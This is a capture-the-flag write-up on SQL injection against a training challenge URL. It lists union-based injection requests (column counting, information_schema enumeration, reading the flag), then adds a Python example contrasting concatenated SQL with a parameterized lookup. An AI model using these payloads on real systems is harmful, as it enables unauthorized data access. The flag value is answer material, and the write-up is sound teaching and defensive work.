Challenge link: http://ctf5.shiyanbar.com/8/index.php?id=1

Manual injection

- Determine whether SQL injection exists
ctf5.shiyanbar.com/8/index.php?id=1'
Returns an error
ctf5.shiyanbar.com/8/index.php?id=1 and 1=1
Opens normally
ctf5.shiyanbar.com/8/index.php?id=1 and 1=2
Opens normally
SQL injection exists

- Confirm the PoC
http://ctf5.shiyanbar.com/8/index.php?id=1 or 1=1

- Find the number of columns
http://ctf5.shiyanbar.com/8/index.php?id=1 order by 1
Displays normally
http://ctf5.shiyanbar.com/8/index.php?id=1 order by 2
Displays normally
http://ctf5.shiyanbar.com/8/index.php?id=1 order by 3
Returns an error
The number of columns is 2

- Query the databases
http://ctf5.shiyanbar.com/8/index.php?id=1 and 1=2 union select 1,schema_name from information_schema.schemata limit 0,2
Found the database my_db

- Query the tables
http://ctf5.shiyanbar.com/8/index.php?id=1 union select table_schema,table_name from information_schema.tables
Found the table thiskey

- Query the columns of the table
http://ctf5.shiyanbar.com/8/index.php?id=1 union select table_name,column_name from information_schema.columns
Found the column k0y

- Read the value
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,k0y from thiskey
Value read: whatiMyD91dump
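
Every step above works because the numeric `id` parameter is pasted into the SQL text. The following is an added example, not code from the challenge: it reproduces that root cause next to a hardened lookup, using an in-memory SQLite database as a stand-in for the challenge's backend. The table name `articles`, the function names and the stored secret are assumptions constructed for the illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the challenge database: a two-column content
    # table (hypothetical name "articles") plus the thiskey table from the write-up.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, body TEXT);
        INSERT INTO articles VALUES (1, 'article one');
        CREATE TABLE thiskey (k0y TEXT);
        INSERT INTO thiskey VALUES ('CONSTRUCTED-SECRET');
    """)
    return db

def lookup_vulnerable(db, raw_id):
    # The parameter is concatenated into the SQL text, so anything after the
    # number (ORDER BY, UNION SELECT ...) is parsed as part of the statement.
    sql = "SELECT id, body FROM articles WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def lookup_hardened(db, raw_id):
    # 1) Allow-list the expected shape: a short run of ASCII digits only.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    # 2) Bind the value as data; the SQL text never changes with the input.
    sql = "SELECT id, body FROM articles WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def probe_raises(db, raw_id):
    # True when the vulnerable lookup surfaces a database error to the caller,
    # which is the signal the quote and "order by 3" requests rely on.
    try:
        lookup_vulnerable(db, raw_id)
    except sqlite3.Error:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    for value in ["1", "1'", "1 order by 3", "1 union select 1,k0y from thiskey"]:
        print(repr(value), "hardened ->", lookup_hardened(db, value))
```

With the hardened lookup, the quote, `order by` and `union select` inputs all return an empty result and never reach the SQL parser, so neither the error signal nor the second table is exposed.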